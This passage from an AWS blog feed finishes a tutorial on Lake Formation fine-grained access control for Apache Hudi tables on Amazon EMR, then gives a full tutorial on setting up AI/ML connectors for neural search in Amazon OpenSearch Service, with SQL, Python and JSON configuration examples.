  2. Choose Connect.
  3. For EMR execution role, choose <STACK-NAME>-hudi-db-creator-role.
  4. Choose Connect.

Create database and tables

Now you can follow the steps in the notebook to create the Hudi database and tables. The major steps are as follows:

  1. When you start the notebook, configure "spark.sql.catalog.spark_catalog.lf.managed": "true" to inform Spark that spark_catalog is protected by Lake Formation.
  2. Create Hudi tables using the following Spark SQL.
%%sql 
CREATE TABLE IF NOT EXISTS ${hudi_catalog}.${hudi_db}.${cow_table_name_sql}(
    c_customer_id string,
    c_birth_country string,
    c_customer_sk integer,
    c_email_address string,
    c_first_name string,
    c_last_name string,
    ts bigint
) USING hudi
LOCATION '${cow_table_location_sql}'
OPTIONS (
  type = 'cow',
  primaryKey = '${hudi_primary_key}',
  preCombineField = '${hudi_pre_combined_field}'
 ) 
PARTITIONED BY (${hudi_partitioin_field});

  1. Insert data from the source table to the Hudi tables.
%%sql
INSERT OVERWRITE ${hudi_catalog}.${hudi_db}.${cow_table_name_sql}
SELECT 
    c_customer_id ,  
    c_customer_sk,
    c_email_address,
    c_first_name,
    c_last_name,
    unix_timestamp(current_timestamp()) AS ts,
    c_birth_country
FROM ${src_df_view}
WHERE c_birth_country = 'HONG KONG' OR c_birth_country = 'CHINA' 
LIMIT 1000
  1. Insert data again into the Hudi tables.
%%sql
INSERT INTO ${hudi_catalog}.${hudi_db}.${cow_table_name_sql}
SELECT 
    c_customer_id ,  
    c_customer_sk,
    c_email_address,
    c_first_name,
    c_last_name,
    unix_timestamp(current_timestamp()) AS ts,
    c_birth_country
FROM ${insert_into_view}

Query the Hudi tables via Lake Formation with FGAC

After you create the Hudi database and tables, you’re ready to query the tables using fine-grained access control with Lake Formation. We have created two types of Hudi tables: Copy-On-Write (COW) and Merge-On-Read (MOR). The COW table stores data in a columnar format (Parquet), and each update creates a new version of files during a write. This means that for every update, Hudi rewrites the entire file, which can be more resource-intensive but provides faster read performance. MOR, on the other hand, is introduced for cases where COW may not be optimal, particularly for write- or change-heavy workloads. In a MOR table, each time there is an update, Hudi writes only the row for the changed record, which reduces cost and enables low-latency writes. However, the read performance might be slower compared to COW tables.
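To make the trade-off concrete, here is a deliberately simplified Python model of the two table types. It is not how Hudi is implemented (there are no Parquet files, compaction, or timelines here), and the class names are hypothetical. It only counts how many rows each strategy writes for the same sequence of updates, and shows that the MOR reader has to merge the log at read time.

```python
class CopyOnWriteFile:
    """Toy COW file: every update rewrites the whole file."""

    def __init__(self, rows):
        self.rows = dict(rows)
        self.rows_written = len(self.rows)  # initial write of the file

    def update(self, key, value):
        new_version = dict(self.rows)
        new_version[key] = value
        self.rows = new_version
        self.rows_written += len(new_version)  # the entire file is written again

    def read(self):
        return dict(self.rows)  # no merge work at read time


class MergeOnReadFile:
    """Toy MOR file: updates are appended to a log and merged when read."""

    def __init__(self, rows):
        self.base = dict(rows)
        self.log = []
        self.rows_written = len(self.base)

    def update(self, key, value):
        self.log.append((key, value))
        self.rows_written += 1  # only the changed record is written

    def read(self):
        merged = dict(self.base)
        for key, value in self.log:  # merge cost is paid by the reader
            merged[key] = value
        return merged


base = {f"id-{i}": "v0" for i in range(1000)}
cow, mor = CopyOnWriteFile(base), MergeOnReadFile(base)
for i in range(10):
    cow.update(f"id-{i}", "v1")
    mor.update(f"id-{i}", "v1")
print("rows written (COW, MOR):", cow.rows_written, mor.rows_written)
```

Both objects return the same data from read(), but the COW model writes far more rows for the same updates, while the MOR model defers work to the reader.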

Grant table access permission

We use the IAM role <STACK-NAME>-hudi-table-pii-role to query the Hudi COW and MOR tables containing PII columns. We first grant the table access permission via Lake Formation:

  1. On the Lake Formation console, choose Data lake permissions under Permissions in the navigation pane.
  2. Choose Grant.
  3. Choose <STACK-NAME>-hudi-table-pii-role for IAM users and roles.
  4. Choose the rsv2_blog_hudi_db_1 database for Databases.
  5. For Tables, choose the four Hudi tables you created in the Jupyter notebook.

LF - Grant data permissions

  1. For Table permissions, select Select.
  2. Choose Grant.

LF - table permissions

Query PII columns

Now you’re ready to run the notebook to query the Hudi tables. Let’s follow similar steps to the previous section to run the notebook in SageMaker Studio:

  1. On the SageMaker console, navigate to the <STACK-NAME>-Studio-EMR-LF-Hudi domain.
  2. On the Launch menu next to the <STACK-NAME>-hudi-table-reader user profile, choose Studio.
  3. Upload the downloaded notebook rsv2-hudi-table-pii-reader-notebook.
  4. Open the uploaded notebook.
  5. Repeat the notebook setup steps and connect to the same EMR cluster, but use the role <STACK-NAME>-hudi-table-pii-role.

Currently, an FGAC-enabled EMR cluster must filter on Hudi’s commit time column (_hoodie_commit_time) to perform incremental queries and time travel. It doesn’t support Spark’s “timestamp as of” syntax or spark.read(). We are actively working on incorporating support for both in future Amazon EMR releases with FGAC enabled.

You can now follow the steps in the notebook. The following are some highlighted steps:

  1. Run a snapshot query.
%%sql 
SELECT c_birth_country, count(*) FROM ${hudi_catalog}.${hudi_db}.${cow_table_name_sql} GROUP BY c_birth_country;
  1. Run an incremental query.
incremental_df = spark.sql(f"""
SELECT * FROM {HUDI_CATALOG}.{HUDI_DATABASE}.{COW_TABLE_NAME_SQL} WHERE _hoodie_commit_time >= {commit_ts[-1]}
""")

incremental_df.createOrReplaceTempView("incremental_view")
%%sql
SELECT 
    c_birth_country, 
    count(*) 
FROM incremental_view
GROUP BY c_birth_country;
  1. Run a time travel query.
%%sql
SELECT
    c_birth_country, COUNT(*) as count
FROM ${hudi_catalog}.${hudi_db}.${cow_table_name_sql}
WHERE _hoodie_commit_time IN
(
    SELECT DISTINCT _hoodie_commit_time FROM ${hudi_catalog}.${hudi_db}.${cow_table_name_sql} ORDER BY _hoodie_commit_time LIMIT 1 
)
GROUP BY c_birth_country
  1. Run MOR read-optimized and real-time table queries.
%%sql
SELECT
    a.email_label,
    count(*)
FROM (
    SELECT
        CASE
            WHEN c_email_address = 'UNKNOWN' THEN 'UNKNOWN'
            ELSE 'NOT_UNKNOWN'
        END AS email_label
    FROM ${hudi_catalog}.${hudi_db}.${mor_table_name_sql}_ro
    WHERE c_birth_country = 'HONG KONG'
) a
GROUP BY a.email_label;
%%sql
SELECT *  
FROM ${hudi_catalog}.${hudi_db}.${mor_table_name_sql}_rt
WHERE 
    c_birth_country = 'INDIA' OR c_first_name = 'MASKED'
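The snapshot, incremental, and time travel queries above differ only in how they filter on _hoodie_commit_time. The following plain-Python sketch mirrors that logic on a few made-up rows so you can see the effect without a cluster. The sample data and function names are hypothetical, and real Hudi commit times may use a longer timestamp format.

```python
from collections import Counter

# Made-up rows; commit times are strings, so they compare lexicographically.
ROWS = [
    {"c_customer_sk": 1, "c_birth_country": "CHINA", "_hoodie_commit_time": "20240101120000"},
    {"c_customer_sk": 2, "c_birth_country": "HONG KONG", "_hoodie_commit_time": "20240101120000"},
    {"c_customer_sk": 3, "c_birth_country": "CHINA", "_hoodie_commit_time": "20240102090000"},
    {"c_customer_sk": 4, "c_birth_country": "INDIA", "_hoodie_commit_time": "20240102090000"},
]


def count_by_country(rows):
    """Equivalent of SELECT c_birth_country, count(*) ... GROUP BY c_birth_country."""
    return dict(Counter(row["c_birth_country"] for row in rows))


def snapshot(rows):
    """Snapshot query: no commit time filter."""
    return list(rows)


def incremental(rows, begin_commit):
    """Incremental query: WHERE _hoodie_commit_time >= begin_commit."""
    return [row for row in rows if row["_hoodie_commit_time"] >= begin_commit]


def earliest_commit(rows):
    """Time travel as written above: keep only rows from the earliest commit."""
    first = min(row["_hoodie_commit_time"] for row in rows)
    return [row for row in rows if row["_hoodie_commit_time"] == first]


print(count_by_country(snapshot(ROWS)))
print(count_by_country(incremental(ROWS, "20240102090000")))
print(count_by_country(earliest_commit(ROWS)))
```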

Query the Hudi tables with column-level and row-level data filters

We use the IAM role <STACK-NAME>-hudi-table-non-pii-role to query Hudi tables. This role is not allowed to query any columns containing PII. We use the Lake Formation column-level and row-level data filters to implement fine-grained access control:

  1. On the Lake Formation console, choose Data filters under Data Catalog in the navigation pane.
  2. Choose Create new filter.
  3. For Data filter name, enter customer-pii-filter.
  4. Choose rsv2_blog_hudi_db_1 for Target database.
  5. Choose rsv2_blog_hudi_mor_sql_dl_customer_1 for Target table.
  6. Select Exclude columns and choose the c_customer_id, c_email_address, and c_last_name columns.
  7. Enter c_birth_country != 'HONG KONG' for Row filter expression.
  8. Choose Create filter.
  8. Choose Create filter.

LF - create data filter

  1. Choose Data lake permissions under Permissions in the navigation pane.
  2. Choose Grant.
  3. Choose <STACK-NAME>-hudi-table-non-pii-role for IAM users and roles.
  4. Choose rsv2_blog_hudi_db_1 for Databases.
  5. Choose rsv2_blog_hudi_mor_sql_dl_tpc_customer_1 for Tables.
  6. Choose customer-pii-filter for Data filters.
  7. For Data filter permissions, select Select.
  8. Choose Grant.

LF - Grant data permissions
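For reference, the data filter defined on the console earlier in this section can also be described as a request payload. The sketch below builds a dictionary in the shape of the TableData argument of the Lake Formation CreateDataCellsFilter API, as we understand it. The helper name and the account ID are placeholders, and the sketch doesn't call AWS.

```python
def build_data_cells_filter(account_id, database, table, name, excluded_columns, row_filter):
    """Build a TableData-style payload for a Lake Formation data cells filter (sketch)."""
    return {
        "TableCatalogId": account_id,
        "DatabaseName": database,
        "TableName": table,
        "Name": name,
        # Column-level filter: every column except the excluded ones stays visible
        "ColumnWildcard": {"ExcludedColumnNames": list(excluded_columns)},
        # Row-level filter: only rows matching the expression stay visible
        "RowFilter": {"FilterExpression": row_filter},
    }


table_data = build_data_cells_filter(
    account_id="111122223333",  # placeholder AWS account ID
    database="rsv2_blog_hudi_db_1",
    table="rsv2_blog_hudi_mor_sql_dl_customer_1",
    name="customer-pii-filter",
    excluded_columns=["c_customer_id", "c_email_address", "c_last_name"],
    row_filter="c_birth_country != 'HONG KONG'",
)
```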

Let’s follow similar steps to run the notebook in SageMaker Studio:

  1. On the SageMaker console, navigate to the domain Studio-EMR-LF-Hudi.
  2. On the Launch menu for the hudi-table-reader user profile, choose Studio.
  3. Upload the downloaded notebook rsv2-hudi-table-non-pii-reader-notebook and choose Open.
  4. Repeat the notebook setup steps and connect to the same EMR cluster, but select the role <STACK-NAME>-hudi-table-non-pii-role.

You can now follow the steps in the notebook. From the query results, you can see that FGAC via the Lake Formation data filter has been applied. The role can’t see the PII columns c_customer_id, c_last_name, and c_email_address. Also, the rows from HONG KONG have been filtered out.

filtered query result
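The effect of the data filter can be illustrated with a few lines of plain Python. This is only a model of the outcome, not of how Lake Formation or Amazon EMR enforce it, and the sample rows are made up.

```python
# Columns excluded by customer-pii-filter, and the row filter value, from the steps above.
EXCLUDED_COLUMNS = {"c_customer_id", "c_email_address", "c_last_name"}
FILTERED_COUNTRY = "HONG KONG"


def apply_data_filter(rows):
    """Drop filtered rows first, then remove the excluded columns from what remains."""
    visible = []
    for row in rows:
        if row["c_birth_country"] == FILTERED_COUNTRY:
            continue  # row filter: c_birth_country != 'HONG KONG'
        visible.append({col: val for col, val in row.items() if col not in EXCLUDED_COLUMNS})
    return visible


sample_rows = [
    {"c_customer_id": "AAA1", "c_first_name": "Ana", "c_last_name": "Silva",
     "c_email_address": "ana@example.com", "c_birth_country": "CHINA"},
    {"c_customer_id": "AAA2", "c_first_name": "Li", "c_last_name": "Wong",
     "c_email_address": "li@example.com", "c_birth_country": "HONG KONG"},
]
print(apply_data_filter(sample_rows))
```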

Clean up

After you’re done experimenting with the solution, we recommend cleaning up resources with the following steps to avoid unexpected costs:

  1. Shut down the SageMaker Studio apps for the user profiles.

The EMR cluster is automatically terminated after the idle timeout elapses.

  1. Delete the Amazon Elastic File System (Amazon EFS) volume created for the domain.
  2. Empty the S3 buckets created by the CloudFormation stack.
  3. On the AWS CloudFormation console, delete the stack.

Conclusion

In this post, we used Apache Hudi, one type of OTF table, to demonstrate this new feature for enforcing fine-grained access control on Amazon EMR. You can define granular permissions in Lake Formation for OTF tables and apply them via Spark SQL queries on EMR clusters. You can also use transactional data lake features such as snapshot queries, incremental queries, time travel, and DML queries. Note that this new feature covers all OTF tables.

This feature is available starting with Amazon EMR release 6.15 in all Regions where Amazon EMR is available. With the Amazon EMR integration with Lake Formation, you can confidently manage and process big data, unlocking insights and facilitating informed decision-making while upholding data security and governance.

To learn more, refer to Enable Lake Formation with Amazon EMR and feel free to contact your AWS Solutions Architects, who can assist you along your data journey.


About the Authors

Raymond Lai is a Senior Solutions Architect who specializes in catering to the needs of large enterprise customers. His expertise lies in assisting customers with migrating intricate enterprise systems and databases to AWS, constructing enterprise data warehousing and data lake platforms. Raymond excels in identifying and designing solutions for AI/ML use cases, and he has a particular focus on AWS Serverless solutions and Event Driven Architecture design.

Bin Wang, PhD, is a Senior Analytic Specialist Solutions Architect at AWS, boasting over 12 years of experience in the ML industry, with a particular focus on advertising. He possesses expertise in natural language processing (NLP), recommender systems, diverse ML algorithms, and ML operations. He is deeply passionate about applying ML/DL and big data techniques to solve real-world problems.

Aditya Shah is a Software Development Engineer at AWS. He is interested in Databases and Data warehouse engines and has worked on performance optimisations, security compliance and ACID compliance for engines like Apache Hive and Apache Spark.

Melody Yang is a Senior Big Data Solution Architect for Amazon EMR at AWS. She is an experienced analytics leader working with AWS customers to provide best practice guidance and technical advice in order to assist their success in data transformation. Her areas of interest are open-source frameworks and automation, data engineering, and DataOps.

Power neural search with AI/ML connectors in Amazon OpenSearch Service

Post Syndicated from Aruna Govindaraju original https://aws.amazon.com/blogs/big-data/power-neural-search-with-ai-ml-connectors-in-amazon-opensearch-service/

With the launch of the neural search feature for Amazon OpenSearch Service in OpenSearch 2.9, it’s now effortless to integrate with AI/ML models to power semantic search and other use cases. OpenSearch Service has supported both lexical and vector search since the introduction of its k-nearest neighbor (k-NN) feature in 2020; however, configuring semantic search required building a framework to integrate machine learning (ML) models to ingest and search. The neural search feature facilitates text-to-vector transformation during ingestion and search. When you use a neural query during search, the query is translated into a vector embedding and k-NN is used to return the nearest vector embeddings from the corpus.
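To illustrate the idea of returning the nearest vector embeddings, here is a brute-force k-NN sketch in plain Python using cosine similarity. The three-dimensional vectors and document names are invented for the example. Real embeddings come from the ML model, and OpenSearch Service uses approximate k-NN indexes rather than the exhaustive scan shown here.

```python
import math


def cosine_similarity(a, b):
    """Cosine of the angle between two equal-length vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    return dot / (norm_a * norm_b)


def knn(query_vector, corpus, k):
    """Return the IDs of the k corpus vectors most similar to the query vector."""
    ranked = sorted(
        corpus.items(),
        key=lambda item: cosine_similarity(query_vector, item[1]),
        reverse=True,
    )
    return [doc_id for doc_id, _ in ranked[:k]]


# Toy "embeddings"; in practice the model produces these during ingestion and search.
corpus = {
    "red shoes": [0.9, 0.1, 0.0],
    "blue jacket": [0.1, 0.9, 0.0],
    "crimson sneakers": [0.8, 0.2, 0.1],
}
query_vector = [1.0, 0.0, 0.0]  # stands in for the embedding of the search text
print(knn(query_vector, corpus, k=2))
```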

To use neural search, you must set up an ML model. We recommend configuring AI/ML connectors to AWS AI and ML services (such as Amazon SageMaker or Amazon Bedrock) or third-party alternatives. Starting with version 2.9 on OpenSearch Service, AI/ML connectors integrate with neural search to simplify and operationalize the translation of your data corpus and queries to vector embeddings, thereby removing much of the complexity of vector hydration and search.

In this post, we demonstrate how to configure AI/ML connectors to external models through the OpenSearch Service console.

Solution Overview

Specifically, this post walks you through connecting to a model in SageMaker. Then we guide you through using the connector to configure semantic search on OpenSearch Service as an example of a use case that is supported through connection to an ML model. Amazon Bedrock and SageMaker integrations are currently supported on the OpenSearch Service console UI, and the list of UI-supported first- and third-party integrations will continue to grow.

For any models not supported through the UI, you can instead set them up using the available APIs and the ML blueprints. For more information, refer to Introduction to OpenSearch Models. You can find blueprints for each connector in the ML Commons GitHub repository.

Prerequisites

Before connecting the model via the OpenSearch Service console, create an OpenSearch Service domain. Map an AWS Identity and Access Management (IAM) role by the name LambdaInvokeOpenSearchMLCommonsRole as the backend role on the ml_full_access role using the Security plugin on OpenSearch Dashboards, as shown in the following video. The OpenSearch Service integrations workflow is pre-filled to use the LambdaInvokeOpenSearchMLCommonsRole IAM role by default to create the connector between the OpenSearch Service domain and the model deployed on SageMaker. If you use a custom IAM role on the OpenSearch Service console integrations, make sure the custom role is mapped as the backend role with ml_full_access permissions prior to deploying the template.

Deploy the model using AWS CloudFormation

The following video demonstrates the steps to use the OpenSearch Service console to deploy a model within minutes on Amazon SageMaker and generate the model ID via the AI connectors. The first step is to choose Integrations in the navigation pane on the OpenSearch Service AWS console, which routes to a list of available integrations. The integration is set up through a UI, which will prompt you for the necessary inputs.

To set up the integration, you only need to provide the OpenSearch Service domain endpoint and provide a model name to uniquely identify the model connection. By default, the template deploys the Hugging Face sentence-transformers model, djl://ai.djl.huggingface.pytorch/sentence-transformers/all-MiniLM-L6-v2.

When you choose Create Stack, you are routed to the AWS CloudFormation console. The CloudFormation template deploys the architecture detailed in the following diagram.

The CloudFormation stack creates an AWS Lambda application that deploys a model from Amazon Simple Storage Service (Amazon S3), creates the connector, and generates the model ID in the output. You can then use this model ID to create a semantic index.

If the default all-MiniLM-L6-v2 model doesn’t serve your purpose, you can deploy any text embedding model of your choice on the chosen model host (SageMaker or Amazon Bedrock) by providing your model artifacts as an accessible S3 object. Alternatively, you can select one of the following pre-trained language models and deploy it to SageMaker. For instructions to set up your endpoint and models, refer to Available Amazon SageMaker Images.

SageMaker is a fully managed service that brings together a broad set of tools to enable high-performance, low-cost ML for any use case, delivering key benefits such as model monitoring, serverless hosting, and workflow automation for continuous training and deployment. SageMaker allows you to host and manage the lifecycle of text embedding models, and use them to power semantic search queries in OpenSearch Service. When connected, SageMaker hosts your models and OpenSearch Service is used to query based on inference results from SageMaker.

View the deployed model through OpenSearch Dashboards

To verify the CloudFormation template successfully deployed the model on the OpenSearch Service domain and get the model ID, you can use the ML Commons REST GET API through OpenSearch Dashboards Dev Tools.

The GET _plugins REST API now provides additional APIs to also view the model status. The following command allows you to see the status of a remote model:

GET _plugins/_ml/models/<modelid>

As shown in the following screenshot, a DEPLOYED status in the response indicates the model is successfully deployed on the OpenSearch Service cluster.

Alternatively, you can view the model deployed on your OpenSearch Service domain using the Machine Learning page of OpenSearch Dashboards.

This page lists the model information and the statuses of all the models deployed.
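If you automate this check, you can test the status field of the GET response before moving on. The sketch below assumes the response JSON carries the status in a model_state field, which matches our understanding of the ML Commons model API. The sample response is trimmed and hypothetical.

```python
def is_model_deployed(response):
    """Return True when a parsed model GET response reports the DEPLOYED state."""
    # model_state is assumed to be the field that holds the status
    return response.get("model_state") == "DEPLOYED"


# Trimmed, hypothetical response body, already parsed from JSON
sample_response = {"name": "my-embedding-model", "model_state": "DEPLOYED"}
print(is_model_deployed(sample_response))
```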

Create the neural pipeline using the model ID

When the status of the model shows as either DEPLOYED in Dev Tools or green and Responding in OpenSearch Dashboards, you can use the model ID to build your neural ingest pipeline. The following ingest pipeline is run in your domain’s OpenSearch Dashboards Dev Tools. Make sure you replace the model ID with the unique ID generated for the model deployed on your domain.

PUT _ingest/pipeline/neural-pipeline
{
  "description": "Semantic Search for retail product catalog ",
  "processors" : [
    {
      "text_embedding": {
        "model_id": "sfG4zosBIsICJFsINo3X",
        "field_map": {
           "description": "desc_v",
           "name": "name_v"
        }
      }
    }
  ]
}

Create the semantic search index using the neural pipeline as the default pipeline

You can now define your index mapping with the default pipeline configured to use the new neural pipeline you created in the previous step. Ensure the vector fields are declared as knn_vector and the dimensions are appropriate to the model that is deployed on SageMaker. If you have retained the default configuration to deploy the all-MiniLM-L6-v2 model on SageMaker, keep the following settings as is and run the command in Dev Tools.

PUT semantic_demostore
{
  "settings": {
    "index.knn": true,  
    "default_pipeline": "neural-pipeline",
    "number_of_shards": 1,
    "number_of_replicas": 1
  },
  "mappings": {
    "properties": {
      "desc_v": {
        "type": "knn_vector",
        "dimension": 384,
        "method": {
          "name": "hnsw",
          "engine": "nmslib",
          "space_type": "cosinesimil"
        }
      },
      "name_v": {
        "type": "knn_vector",
        "dimension": 384,
        "method": {
          "name": "hnsw",
          "engine": "nmslib",
          "space_type": "cosinesimil"
        }
      },
      "description": {
        "type": "text" 
      },
      "name": {
        "type": "text" 
      } 
    }
  }
}
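The ingest pipeline and the index mapping have to agree on the vector field names, and the vector dimension has to match the model (384 for all-MiniLM-L6-v2). One way to keep them in sync is to generate both request bodies from a single field map. The following sketch does that; the helper names are hypothetical, and the bodies mirror the two requests shown above.

```python
def build_pipeline(model_id, field_map, description="Semantic search pipeline"):
    """Body for PUT _ingest/pipeline/<name>; field_map maps text fields to vector fields."""
    return {
        "description": description,
        "processors": [{"text_embedding": {"model_id": model_id, "field_map": dict(field_map)}}],
    }


def build_index(pipeline_name, field_map, dimension):
    """Body for PUT <index>, with one text and one knn_vector property per mapped field."""
    properties = {}
    for text_field, vector_field in field_map.items():
        properties[text_field] = {"type": "text"}
        properties[vector_field] = {
            "type": "knn_vector",
            "dimension": dimension,  # must match the embedding size of the deployed model
            "method": {"name": "hnsw", "engine": "nmslib", "space_type": "cosinesimil"},
        }
    return {
        "settings": {
            "index.knn": True,
            "default_pipeline": pipeline_name,
            "number_of_shards": 1,
            "number_of_replicas": 1,
        },
        "mappings": {"properties": properties},
    }


FIELD_MAP = {"description": "desc_v", "name": "name_v"}
pipeline_body = build_pipeline("sfG4zosBIsICJFsINo3X", FIELD_MAP)  # replace with your model ID
index_body = build_index("neural-pipeline", FIELD_MAP, dimension=384)
```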

Ingest sample documents to generate vectors

For this demo, you can ingest the sample retail demostore product catalog to the new semantic_demostore index. Replace the user name, password, and domain endpoint with your domain information and ingest raw data into OpenSearch Service:

curl -XPOST -u 'username:password' 'https://domain-end-point/_bulk' --data-binary @semantic_demostore.json -H 'Content-Type: application/json'
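The file passed to the _bulk endpoint is newline-delimited JSON: an action line followed by the document, with a trailing newline at the end. If you want to try the flow with your own documents, the following sketch builds such a payload. The sample documents and the helper name are hypothetical; the field names match the index mapping above.

```python
import json


def to_bulk_payload(index_name, docs):
    """Serialize (doc_id, document) pairs into the NDJSON body expected by _bulk."""
    lines = []
    for doc_id, doc in docs:
        lines.append(json.dumps({"index": {"_index": index_name, "_id": doc_id}}))
        lines.append(json.dumps(doc))
    return "\n".join(lines) + "\n"  # the bulk body must end with a newline


sample_docs = [
    ("1", {"name": "Trail running shoes", "description": "Lightweight shoes for rough terrain"}),
    ("2", {"name": "Rain jacket", "description": "Waterproof shell for wet weather"}),
]
payload = to_bulk_payload("semantic_demostore", sample_docs)
print(payload)
```

You could write payload to a file and send it with the curl command above.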

Validate the new semantic_demostore index

Now that you have ingested your dataset to the OpenSearch Service domain, validate whether the required vectors are generated by using a simple search to fetch all fields. Confirm that the fields defined as knn_vector contain the required vectors.

Compare lexical search and semantic search powered by neural search using the Compare Search Results tool

The Compare Search Results tool on OpenSearch Dashboards is available for production workloads. You can navigate to the Compare search results page and compare query results between lexical search and neural search configured to use the model ID generated earlier.
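As a starting point for the comparison, the following sketch builds the two query bodies: a lexical match query on the description field and a neural query on the desc_v vector field. The neural clause follows the OpenSearch neural query syntax (query_text, model_id, k). The helper names, the search text, and the value of k are placeholders.

```python
def lexical_query(text, field="description"):
    """Keyword (lexical) search on a text field."""
    return {"query": {"match": {field: text}}}


def neural_query(text, model_id, vector_field="desc_v", k=5):
    """Semantic search: the text is embedded by the model, then k-NN runs on the vector field."""
    return {
        "query": {
            "neural": {
                vector_field: {"query_text": text, "model_id": model_id, "k": k}
            }
        }
    }


search_text = "shoes for hiking"
left = lexical_query(search_text)
right = neural_query(search_text, model_id="sfG4zosBIsICJFsINo3X")  # replace with your model ID
```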

Clean up

You can delete the resources you created following the instructions in this post by deleting the CloudFormation stack. This will delete the Lambda resources and the S3 bucket that contains the model that was deployed to SageMaker. Complete the following steps:

  1. On the AWS CloudFormation console, navigate to your stack details page.
  2. Choose Delete.
  3. Choose Delete to confirm.

You can monitor the stack deletion progress on the AWS CloudFormation console.

Note that deleting the CloudFormation stack doesn’t delete the model deployed on the SageMaker domain or the AI/ML connector that was created. This is because the model and the connector can be associated with multiple indexes within the domain. To specifically delete a model and its associated connector, use the model APIs as shown in the following screenshots.

First, undeploy the model from the OpenSearch Service domain memory:

POST /_plugins/_ml/models/<model_id>/_undeploy

Then you can delete the model from the model index:

DELETE /_plugins/_ml/models/<model_id>

Lastly, delete the connector from the connector index:

DELETE /_plugins/_ml/connectors/<connector_id>

Conclusion

In this post, you learned how to deploy a model in SageMaker, create the AI/ML connector using the OpenSearch Service console, and build the neural search index. The ability to configure AI/ML connectors in OpenSearch Service simplifies the vector hydration process by making the integrations to external models native. You can create a neural search index in minutes using the neural ingestion pipeline and neural search, which use the model ID to generate vector embeddings on the fly during ingest and search.

To learn more about these AI/ML connectors, refer to Amazon OpenSearch Service AI connectors for AWS services, AWS CloudFormation template integrations for semantic search, and Creating connectors for third-party ML platforms.


About the Authors

Aruna Govindaraju is an Amazon OpenSearch Specialist Solutions Architect and has worked with many commercial and open source search engines. She is passionate about search, relevancy, and user experience. Her expertise with correlating end-user signals with search engine behavior has helped many customers improve their search experience.

Dagney Braun is a Principal Product Manager at AWS focused on OpenSearch.